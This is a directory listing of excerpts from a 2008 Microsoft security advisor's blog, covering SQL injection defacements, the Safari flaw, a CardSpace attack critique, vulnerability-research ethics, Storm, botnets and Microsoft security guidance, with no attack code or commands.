Directory —
Technology —
Blog Details for "Roger's Security Blog"
Roger's Security BlogRoger's Security BlogI am Microsoft' Chief Security Advisor for Europe, Middle East and Africa and this blog is mainly about information security. 
Articles
Security Compliance Management ? Solution Accelerator Available
2008-06-07 15:16:00 I wrote about it as we released the Beta. Now, the Solution Accelerator for Security Compliance Management is live and available. It is definitely worth looking at it: Security Compliance Management. Just to quote from the webpage: In today's IT environment, the ability to comply with regulations and industry standards, such as the Sarbanes Oxley Act, is a source of deep concern for many organizations. In addition, organizations need to manage risks resulting from emerging threats and changing conditions within their IT infrastructures. As a result, organizations need sound methods that they can count on to understand the state of the security settings in their IT infrastructures, assess the compliance of a security baseline, and demonstrate that compliance requirements have been met. To help organizations address these challenges, Microsoft has created the Security Compliance Management toolkit. The toolkit provides best practices from Microsoft about how to plan, deploy, and moni...
The Emancipation of Hackers
2008-06-04 16:00:00 In the world of Chinese Hackers there seems to be a group especially for female hackers. I just read this post: Chinese Female Hacker Group which show a pretty high growth rate of women joining: The website for the China Girl Security Team was registered on 12 Mar 2007 and currently has 2,217 members. The leader of the group Xiao Tian, is only 19 years old Roger More About: Cybercrime
On-Premise vs. On-Demand (or SaaS) ? A Quocirca Report
2008-06-04 09:00:00 I was made aware of a pretty good report on Software as a Service Quocirca did in collaboration with Microsoft. It is not the kind of "new, what you never heard before"-thing but I personally think that it is a good investment of time to get an overview of Software as a Service and some additional views and thoughts on it. The report can be found here: On-premise and on-demand and you have to go through a free registration in order to get access to the full report Roger More About: Technology , Trends , Report , SAAS , Demand
Windows Server 2008 PKI and Certificate Security
2008-06-03 20:01:00 Fresh out of press (ok, it is out since beginning of April but I just saw it now): Brian Komar, the well-known author of several PKI books on Windows Server just released a new book called Windows Server 2008 PKI and Certificate Security . If you are planning a Windows Server 2008 PKI, this is a must-read (at least knowing Brian's books J). Here is the abstract: Get in-depth guidance for designing and implementing certificate-based security solutions?straight from PKI expert Brian Komar. No need to buy or outsource costly PKI services when you can use the robust PKI and certificate-based security services already built into Windows Server 2008! This in-depth reference teaches you how to design and implement even the most demanding certificate-based security solutions for wireless networking, smart card authentication, VPNs, secure email, Web SSL, EFS, and code-signing applications using Windows Server PKI and certificate services. A principal PKI consultant to Microsoft, Brian sho... More About: Technology
Service Oriented Architecture and the Security Implications
2008-06-03 11:53:00 I was just posting on SOA and the Security Implications of it from a CIO/CSO perspective on my other blog. If you are interested, here is the link Roger More About: Architecture , Trends , Service , Processes
The ?successful? attack on Cardspace
2008-06-02 09:38:00 I guess you read it as it was pretty wide-spread in the press in the last few days: On the Insecurity of Microsoft's Identity Metasystem CardSpace. Well, is there any official Microsoft reaction to it? No, not yet and if you look a little bit more in depth into it, I doubt that there will be. Why? Because the whole setup is ridiculous ? at least in my opinion. To cut it short: If you ignore all the warnings of the OS and pull down all the protection shields we built into Windows Vista, then it is possible to attack Cardspace. This is true. Is it making me nervous? Not really. There are mainly two things that you have to do to make the attack successful before you can steal the Cardspace token: Spoof DNS and "compromise" the Root Cetificate Store. Hmm, we all know that attacking a DNS could be possible (even though they do not include it into their presentation) you need the help of the user as well in order to get a certificate in the Trusted Root store or trick a Certificate Prov... More About: Security , Technology , Attack
New Guidance on the SQL Injection Attacks
2008-05-31 11:23:00 We just published yesterday two new pieces of guidance for the latest SQL Injection attacks, which I want to make sure you saw it: Preventing SQL Injections in ASP SQL Injection Attack ? which is a great piece of work pulling the different views of the latest attacks together Roger More About: Technology , Attacks
Microsoft Advisory for Safari Flaw
2008-05-31 11:19:00 I posted yesterday on the Safari flaw (Why Apple has to fix the Safari flaw) as Apple did not acknowledge that this is a security vulnerability. Unfortunately we had now to release an advisory for this as we started to see that the bad guys could use this "feature" to attack machines ? we are calling it a blended threat. I just wanted to make sure you saw it: Microsoft Security Advisory (953818) - Blended Threat from Combined Attack Using Apple's Safari on the Windows Platform Roger More About: Technology , Cybercrime
The latest SQL Injection Attacks
2008-05-30 09:39:00 Well, there was quite some chatter over the last few weeks with regards to the massive defacements we saw based on SQL Injection Attacks . So, what was really new? Close to nothing. Well, this is not completely true. The new thing we have seen with these attacks is automation; however a lot of people did not really start with this at the beginning. Just as an example, The Washington Post published an article called: Hundreds of Thousands of Microsoft Web Servers Hacked and said Hundreds of thousands of Web sites [?]have been hacked recently and seeded with code that tries to exploit security flaws in Microsoft Windows to install malicious software on visitors' machines. Whereas the first part was true ("just" giving a wrong impression) the content in the article was definitely wrong as it was (and still is) no Windows or IIS vulnerability but just bad programming. What we see are tools that use Google to find web application with potential SQL Injection vulnerabilities and then tr... More About: Security , Technology , Processes
Why Apple has to fix the Safari flaw
2008-05-30 09:19:00 Remember me talking about Is Security Research Ethical? I made a statement in there when it comes to responsible disclosure of vulnerabilities: And then, what does the vendor do with it? Does the company act on it? Now, we can debate on what a vulnerability is and what not. Personally I am convinced that a vendor should be transparent when it takes a bug as a vulnerability and when not. There is actually a good essay by Scott Culp about this called Definition of a Security Vulnerability. Why am I telling this? Well, there seems to be a disagreement between Apple and the rest of the world whether Safari 's Carpet Bombing flaw is a security vulnerability or not. Robert Hensing posted already last week on that (Safari "carpet bombing" Fail Open Goat Award) and ZDnet took it up yesterday as well (Why Apple must fix Safari 'carpet bombing' flaw immediately). And I quote: [?]but when it comes to responding to legitimate security threats, Apple is light years away from living up to the ... More About: Technology
How to sell security
2008-05-27 11:45:00 I just read this essay by Bruce Schneier: How to Sell Security . This is definitely a must-read in my opinion. Not that it really tells you how to sell it but it helps you to understand the "mechanics" about it.Roger More About: Processes
How to Hack Windows Vista
2008-05-27 06:45:00 No, no. For sure. I am not going to give you advise how to hack ? but look at this video: http://www.offensive-security.com/movies/ vistahack/vistahack.html. I am always amazed about these kind of videos, which still surprise people. If look years back, we published the 10 Immutable Laws of Security , which contains Law #3: If a bad guy has unrestricted physical access to your computer, it's not your computer anymore. The hack shown above needs physical access?. But if you want to protect Windows Vista from these kind of physical attacks, why do you not just switch on Bitlocker (and here on Technet)? If you switch it on, these problems are gone and this attack would fail ? and it is part of the OS, no additional fees, nothing? Roger More About: Windows Vista , Hack
Two Important Whitepapers on Windows Server 2008
2008-05-26 16:52:00 If you are planning to implement Windows Server 2008 , there are two paper recently published that could help you with it: Active Directory Certificate Services Upgrade and Migration Guide Configuring and Troubleshooting Certification Authority Clustering in Windows Server 2008 Roger More About: Processes
Researcher at Microsoft Research wins ACM award for Privacy Protection
2008-05-26 08:29:00 I just read this article on Cryptography Expert Wins ACM Award for Advances in Protecting Privacy of Information Retrieval. This is really cool to see that research with do at Microsoft Research not "only" leads to advancements in our products but to public recognition as well. Well done Sergey! Roger More About: Microsoft Research
SANS Commits $1 Million to Fight Cybercrime in Developing Countries
2008-05-24 16:25:00 You know that I criticize SANS from time to time. Especially when it come to their handlers, I am convinced that they are creating the problem rather than solving it. This time I have to say that I am impressed as they are helping developing countries to help to fight Cybercrime . This is as "we are all in this together". As I say often, that we have to collaborate and build partnerships in order to fight the criminals. Read the announcement by SANS: SANS Institute Commits $1 Million for Joint Cyber Defence Program with International Multilateral Partnership Against Cyber-Terrorism (IMPACT) Roger More About: Fight , Countries
Adding additional File Formats in Office 2007 SP2
2008-05-22 21:31:00 We just announced that we will add support for additional file formats in Office System 2007 SP2. Just read more on Open XML, ODF, PDF, and XPS in Office Roger More About: File , Office 2007
Is Security Research Ethical?
2008-05-22 15:26:00 Shoaib's blog actually pointed me to a pretty interesting article called Face-Off: Is vulnerability research ethical? - Security Experts Bruce Schneier & Marcus Ranum Offer Their Opposing Points of View. Not surprisingly Bruce says "yes" and Marcus says "no". If you read through their points, you might even agree partly with each of them: Bruce Schneier: Yes, newly discovered vulnerabilities in software and airports put us at risk, but they also give us more realistic information about how good the security actually is. And yes, there are more and less responsible--and more and less legal--ways to handle a new vulnerability. But the bad guys are constantly searching for new vulnerabilities, and if we have any hope of securing our systems, we need the good guys to be at least as competent. Marcus Ranum: Trust model? What's that? The so-called vulnerability "researchers" are already sharpening their knives for the coming feast. If we were really interested in making software mo... More About: Research , Policy
Analysis of the Estonian Attacks
2008-05-21 18:25:00 I just read a paper on the political analysis of the Estonian Attack. If you are interested reading my post on my other blog (as the analysis is not really technical but interesting) there you go: Analysis of the Estonian Attacks Roger More About: Terrorism , Law Enforcement , Cybercrime
You know about PDOS?
2008-05-21 15:04:00 Well, I know DOS, I know DDOS, but I never knew PDOS until today: there seems to be a new way to attack systems using the firmware update mechanism and generating a Permanent Denial of Service (actually damaging the hardware)?. I was involved in a Ciritical Infrastrucutre Protection workshop about 2 years ago and one of the base scenarios we looked at was a worm that damages hardware. One of the big (very big) hardware vendors then told us that we could kind of play this silly game but that this scenario is completely unlikely. Judge yourself: Permanent Denial-of-Service Attack Sabotages Hardware Roger More About: Trends , Cybercrime
Security Risks of Virtualization
2008-05-21 05:51:00 One fact strikes me pretty often: Companies have the problem that they have legacy software running on legacy operating systems (e.g. NT4) running on legacy hardware. This is a severe problem as you all know. Now, these companies look into virtualization so solve this problem. From all the three "legacy" up there, only the hardware problem can be addressed by the use of virtualization ? definitely not the OS and the application piece (obvious). Now, there are still a lot of people thinking that if they embed the legacy machine in a state-of-the-art virtual environment that the machine itself might be more secure. This can be true ? if you do not connect it to the network. Otherwise, the OS and the application are as vulnerable as before. This is all clear and in the meantime known to a lot of people. Virtualization gives us a lot. I think, it is a great technology to address quite some challenges (especially the challenge of having servers that are mainly "idlein" in the computer r... More About: Security , Technology
Learnings on Publishing SharePoint on ISA Server
2008-05-20 20:39:00 Here Blogging on MOSS 2007 (SharePoint) I talked about the way I use SharePoint and a Codeplex application to build a blog. Shoaib was so kind to let me know that the links of the RSS feed point to the internal server rather than the public URL. If you are interested in the findings, what happened and what I had to do to fix it, read here Roger More About: Technology , Publishing , Server , Sharepoint
Storm coming back?
2008-05-20 14:17:00 I just read first reports that Storm is coming back as we speak. This is frightening but shows the power and possibilities of the criminals as well. I have no information yet how bad it looks like, just read the following report: The Storm Worm would love to infect you Roger More About: Back , Cybercrime
Selling Vulnerabilities and Ethics
2008-05-18 21:19:00 Shoaib just blogged on Hacking & Security Community - Ethical or Unethical?. To start with: I do not claim that I know all about ethics and that there is only one view on ethics but I have a clear view on certain things. I blogged on this theme several times already and made my points pretty clear: Vulnerability Auction Selling Vulnerabilities ? WabiSabiLabi and their view on ethics When I talk to people who are selling vulnerabilities, they keep telling me that it is their right to sell their work and as they do vulnerability research for a living. So, let's use an analogy: How ethical would it be to try to find ways how to break into my house and then selling them to the people paying most as they will offer services to me to protect me? Is this ethical? Not from my perspective. If I would hire somebody to look for these vulnerabilities, this is a different game but I would then want to know them without going public. WasbiSabiLabi tells us that they will not sell to the... More About: Ethics , Cybercrime
The Best Security Blogs on the Web
2008-05-17 21:25:00 Well, this is not what I am claiming to have?. This is what I am looking for. At the moment, I am monitoring/reading the following security-related blogs (sorted alphabetically): Microsoft BitLocker? Drive Encryption Team Blog Chief Security Advisor Finland (in Finish) Chief Security Advisor Italy (in Italian) Chief Security Advisor Switzerland (in English) Chief Security Advisor Russia (in Russian) Gerhard's Marktbeobachtungen (in German) Jeff Jone's Security Blog Kim Cameron's Identity Weblog Mark Russinovitch's Blog Michael Howard's Web Log Microsoft Application Threat Modeling Blog Microsoft Forefront codenamed "Stirling" Team Blog Microsoft Security Response Center Security by Numbers Security Vulnerability Research & Defense Steve Riley on Security The Security Development Lifecycle Windows Vista Security Vendors Errata Security David Litchfield's Weblog Forrester Blog on Security F-Secure Google Online Security Blog iDef... More About: Blogs
Schneier on US Customs Notebook Searches: Do not follow the rules
2008-05-16 08:34:00 I just read this article by Bruce Schneier on what to do about US Customs searches: Taking your laptop into the US? Be sure to hide all your data first So, if you look at part of his recommendations, they are: You're going to have to hide your data. Set a portion of your hard drive to be encrypted with a different key - even if you also encrypt your entire hard drive - and keep your sensitive data there. [?]consider putting your sensitive data on a USB drive or even a camera memory card: even 16GB cards are reasonably priced these days. Encrypt it, of course, because it's easy to lose something that small. Slip it in your pocket, and it's likely to remain unnoticed even if the customs agent pokes through your laptop. If someone does discover it, you can try saying: "I don't know what's on there. My boss told me to give it to the head of the New York office." If you've chosen a strong encryption password, you won't care if he confiscates it. So, if you look at the two recomme... More About: Notebook , Policy , Rules , Cybercrime
Support for Law Enforcement and COFEE
2008-05-14 16:00:00 Over the last few weeks there has been a lot of chatter about a tool we provide in a Beta version to Law Enforcement called COFEE: Computer Online Forensic Evidence Extractor. Let me give you some information on COFEE and put it into the proper context. I am personally convinced that every company has its obligation to work towards making the Internet a safer place. Amongst other things, this means a close collaboration with Law Enforcement. Let's face it: Most of security is about crime prevention! Now, Microsoft has a team internally working with Law Enforcement running different programs: Anti-Phishing Efforts: You know of the Internet Explorer 7 Phishing Filter. Additionally we are founding member of the Digital Phishnet. Anti-Spam Efforts: Again, besides technology we have been a leader in promoting Signal Spam, a unique public/private partnership in Europe and probably in the world. Legislative Efforts: One of the key challenges in fighting cybercime is that most of t... More About: Trends , Support , Cybercrime
Bug Hidden for more than 25 Years
2008-05-14 09:25:00 Wow, this was impressive: A Swiss Developer posted on Saturday a blog that he found a bug which remained hidden for more than 25 years: When seekdir() Won't Seek to the Right Position. BTW: It is in BSD, where the code is available to everyone and as I am told on most of the panels I am sitting in, Open Source is more secure as the bugs are found very fast by the community?? I do not want to pick on Open Source but it would probably be a good time to stop to pick on us and get the own house in order first Roger More About: Technology , Years , Hidden , Processes
More of a third of software is stolen
2008-05-14 08:36:00 BSA just released today a new piracy study and there are some remarkable facts in there: The worldwide weighted average of piracy rate is 38% The median piracy rate in 2007 is 61% Think about the second point for a second: This means that in half of the countries they studied, the piracy rate is 61% or higher. 61% of the software is stolen and people are using stolen software and are making money out of it. For you, this would mean the following: It is Wednesday today. So from now on until the end of the week you deliver your work but do not get paid for! People will simply steal the rest of your week ? amazing isn't it. It even gets worth: The piracy rage is from around 20% (so, this is the lowest figure on the globe) in countries like the US, Luxembourg, New Zealand, Japan,? to more than 90% in Sri Lanka, Zimbabwe, Moldova, Azerbaijan, Bangladesh, Armenia. What does this mean from a security perspective? I would love to see a study on how these users patch their machines. As we h... More About: Software , Trends , Stolen , Cybercrime
Opening a File (Dilbert)
2008-05-12 17:49:00 Ever tried to open a file? Roger More About: File , Opening , Dilbert
How a Botnet looks like
More articles from this author:2008-05-09 10:04:00 If you would like to know a little bit more on botnets and how they actually look like, there is a researcher who actually draw a map of one: What a Botnet Looks Like Roger 1, 2, 3, 4, 5, 6 |
|
